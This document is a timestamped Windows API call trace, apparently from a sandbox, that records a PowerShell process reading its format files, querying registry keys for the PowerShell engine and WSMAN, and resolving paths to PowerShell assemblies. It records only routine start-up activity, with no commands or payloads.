	[0288.304] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xa758045d, Data2=0x40f4, Data3=0x4051, Data4=([0]=0xa5, [1]=0x2d, [2]=0xa9, [3]=0xb2, [4]=0x68, [5]=0xb6, [6]=0x7a, [7]=0x45))) returned 0x0
	[0288.305] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x33fbb3e7, Data2=0x2dc5, Data3=0x4832, Data4=([0]=0xaa, [1]=0x31, [2]=0xf9, [3]=0x84, [4]=0x7b, [5]=0xe0, [6]=0xf9, [7]=0xd6))) returned 0x0
	[0288.305] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.305] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x6e109e27, Data2=0x8edb, Data3=0x44f6, Data4=([0]=0x8e, [1]=0x1e, [2]=0x7d, [3]=0x6, [4]=0x6f, [5]=0x80, [6]=0x1, [7]=0x39))) returned 0x0
	[0288.305] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xfbaf040c, Data2=0x417d, Data3=0x439e, Data4=([0]=0x98, [1]=0xa7, [2]=0xc4, [3]=0xc6, [4]=0xfa, [5]=0x6a, [6]=0xbf, [7]=0x9f))) returned 0x0
	[0288.306] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xaa05b1ec, Data2=0x4825, Data3=0x445e, Data4=([0]=0x92, [1]=0x69, [2]=0x1a, [3]=0x5f, [4]=0x8, [5]=0x6f, [6]=0x35, [7]=0xb9))) returned 0x0
	[0288.306] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xef1bcb00, Data2=0x69c4, Data3=0x477d, Data4=([0]=0x87, [1]=0x31, [2]=0xf3, [3]=0xfa, [4]=0xb0, [5]=0x6, [6]=0x38, [7]=0xc6))) returned 0x0
	[0288.306] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf239d364, Data2=0x6917, Data3=0x479a, Data4=([0]=0xbb, [1]=0x9d, [2]=0x1, [3]=0x97, [4]=0x73, [5]=0x63, [6]=0xc5, [7]=0xd2))) returned 0x0
	[0288.306] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.306] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x117f3689, Data2=0x1ef8, Data3=0x4d6e, Data4=([0]=0xb9, [1]=0x6d, [2]=0x5a, [3]=0x7e, [4]=0x6e, [5]=0x23, [6]=0xbf, [7]=0x3c))) returned 0x0
	[0288.306] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x267f2267, Data2=0x9c3a, Data3=0x4e45, Data4=([0]=0xa9, [1]=0xe6, [2]=0xee, [3]=0x9a, [4]=0x1e, [5]=0x19, [6]=0xb7, [7]=0xe5))) returned 0x0
	[0288.931] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.931] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.931] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.931] VirtualQuery (in: lpAddress=0x12bf30, lpBuffer=0x12cdf0, dwLength=0x30 | out: lpBuffer=0x12cdf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0288.932] SetErrorMode (uMode=0x1) returned 0x1
	[0288.932] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0288.932] GetFileType (hFile=0x1d0) returned 0x1
	[0288.932] SetErrorMode (uMode=0x1) returned 0x1
	[0288.932] GetFileType (hFile=0x1d0) returned 0x1
	[0288.932] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef5e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef5e80*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.933] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef5e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef5e80*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.933] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef5e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef5e80*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.933] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef5e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef5e80*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.934] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef5e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef5e80*, lpNumberOfBytesRead=0x12d258*=0x8b4, lpOverlapped=0x0) returned 1
	[0288.934] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef529c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef529c*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0288.934] ReadFile (in: hFile=0x1d0, lpBuffer=0x2ef5e80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2ef5e80*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0288.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0288.934] SetErrorMode (uMode=0x1) returned 0x1
	[0288.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0288.934] SetErrorMode (uMode=0x1) returned 0x1
	[0288.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0288.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x1d0) returned 0x0
	[0288.935] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0288.935] CoTaskMemAlloc (cb=0x5a) returned 0x37ed30
	[0288.935] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x37ed30, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0288.935] CoTaskMemFree (pv=0x37ed30) 
	[0288.935] RegCloseKey (hKey=0x1d0) returned 0x0
	[0288.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0288.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0288.935] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x903c632e, Data2=0x9ca0, Data3=0x4fe7, Data4=([0]=0xb9, [1]=0xcc, [2]=0x9f, [3]=0x2b, [4]=0x93, [5]=0xd, [6]=0x3b, [7]=0xd6))) returned 0x0
	[0288.936] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xca16dcad, Data2=0x8f74, Data3=0x4902, Data4=([0]=0xbd, [1]=0x38, [2]=0x60, [3]=0xd3, [4]=0x1f, [5]=0xbb, [6]=0x1d, [7]=0x88))) returned 0x0
	[0288.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0288.936] SetErrorMode (uMode=0x1) returned 0x1
	[0288.936] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0288.936] GetFileType (hFile=0x1d0) returned 0x1
	[0288.936] SetErrorMode (uMode=0x1) returned 0x1
	[0288.936] GetFileType (hFile=0x1d0) returned 0x1
	[0288.936] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33c68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.937] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33c68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.937] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33c68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.938] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33c68*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.938] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33c68*, lpNumberOfBytesRead=0x12d258*=0xe98, lpOverlapped=0x0) returned 1
	[0288.938] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33268, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33268*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0288.938] ReadFile (in: hFile=0x1d0, lpBuffer=0x2f33c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2f33c68*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0288.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0288.938] SetErrorMode (uMode=0x1) returned 0x1
	[0288.938] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0288.938] SetErrorMode (uMode=0x1) returned 0x1
	[0288.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0288.939] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x1d0) returned 0x0
	[0288.939] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0288.939] CoTaskMemAlloc (cb=0x5a) returned 0x37ed30
	[0288.939] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x37ed30, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0288.939] CoTaskMemFree (pv=0x37ed30) 
	[0288.939] RegCloseKey (hKey=0x1d0) returned 0x0
	[0288.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0288.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0288.940] VirtualQuery (in: lpAddress=0x12bd80, lpBuffer=0x12cc40, dwLength=0x30 | out: lpBuffer=0x12cc40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.940] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xaf9c5de6, Data2=0x4d, Data3=0x4fb2, Data4=([0]=0xb5, [1]=0x72, [2]=0x78, [3]=0xd9, [4]=0xb6, [5]=0xb9, [6]=0x38, [7]=0x7e))) returned 0x0
	[0288.940] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd786cd5, Data2=0xf2f, Data3=0x4579, Data4=([0]=0xa1, [1]=0x97, [2]=0x59, [3]=0x58, [4]=0x7, [5]=0x4, [6]=0xaa, [7]=0x5d))) returned 0x0
	[0288.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0288.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0288.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0288.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0288.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0288.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0289.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0289.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0289.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0289.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0289.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0289.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0290.573] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.573] CoTaskMemFree (pv=0x389720) 
	[0290.574] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.575] CoTaskMemFree (pv=0x389720) 
	[0290.576] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.576] CoTaskMemFree (pv=0x389720) 
	[0290.577] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.577] CoTaskMemFree (pv=0x389720) 
	[0290.584] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.584] CoTaskMemFree (pv=0x389720) 
	[0290.589] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.589] CoTaskMemFree (pv=0x389720) 
	[0290.590] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0290.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.590] CoTaskMemFree (pv=0x389720) 
	[0290.594] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4f8 | out: phkResult=0x12d4f8*=0x1d0) returned 0x0
	[0290.595] RegQueryInfoKeyW (in: hKey=0x1d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d3fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d3fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d3f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.595] CoTaskMemFree (pv=0x0) 
	[0290.595] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0290.595] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x0, lpValueName=0x314ad0, lpcchValueName=0x12d4a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d4a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0290.595] CoTaskMemFree (pv=0x314ad0) 
